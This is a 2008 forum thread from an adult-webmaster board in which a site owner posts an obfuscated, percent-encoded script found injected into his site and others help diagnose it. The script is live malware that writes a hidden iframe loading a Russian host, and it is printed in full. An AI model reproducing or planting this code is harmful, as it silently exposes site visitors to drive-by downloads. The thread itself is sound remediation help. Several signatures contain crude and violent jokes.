|
|
|
|
||||
|
Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact us. |
 |
|
|||||||
| Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed. |
|
|
Thread Tools |
06-27-2008, 10:26 PM
|
#1 |
|
Confirmed User
Industry Role:
Join Date: Nov 2005
Location: 20 00'24.00" N, 75 09'00.00 W
Posts: 6,882
|
Malicious Code in Website - WTF? .. Someone tell me what do this do?
Code:
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%35%34%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%74%72%61%66%66%75%72%6c%2e%72%75%2f%73%6c%69%76%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%39%34%39%32%30%29%2b%27%61%64%63%36%36%63%39%35%30%5c%27%20%77%69%64%74%68%3d%34%34%33%20%68%65%69%67%68%74%3d%34%34%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>
__________________
Affordable Quality Web Hosting |
|
|
|
06-27-2008, 10:43 PM
|
#2 |
|
. . .
Industry Role:
Join Date: Apr 2007
Location: NY
Posts: 13,724
|
not going to decode it but typically that stuff usually links to some russian site somewhere, thats what I've seen when it happened to me a while back
__________________
__________________ Looking for a custom TUBE SCRIPT that supports massive traffic, load balancing, billing support, and h264 encoding? Hit up Konrad!
Looking for designs for your websites or custom tubesite design? Hit up Zuzana Designs Check out the #1 WordPress SEO Plugin: CyberSEO Suite |
|
|
|
|
06-27-2008, 10:49 PM
|
#3 |
|
Confirmed User
Join Date: Apr 2005
Location: Lazyness is a lifestyle
Posts: 3,201
|
like jetjet said, it is encoded and it is an url... to some codec download or something like that...
which means you got hacked. fix it asap(ideally a reinstall), temporary you can change the perm on your html/php files and remove the code and that will do it.
__________________
 A girl once told me "Give me 8 inches and make it HURT". So, I fucked her twice and hit her with a brick. |
|
|
|
|
06-27-2008, 10:58 PM
|
#4 |
|
Confirmed User
Industry Role:
Join Date: Nov 2005
Location: 20 00'24.00" N, 75 09'00.00 W
Posts: 6,882
|
Thanks for the tips guys. A little search shown it connects to traffurl.ru (DO NOT VISIT) .. not sure what it do, must be downloading something.
Website in question is static (plain html), but uses MultiBox to to show larger view of images in a fashioned way, and a contact page using php form. I have checked the MultiBox thing, they do have update (i am gonna do that), but no vulnerability is reported or so .. must have something related to contact form or permissions. gonna check.. thanks again.
__________________
Affordable Quality Web Hosting |
|
|
|
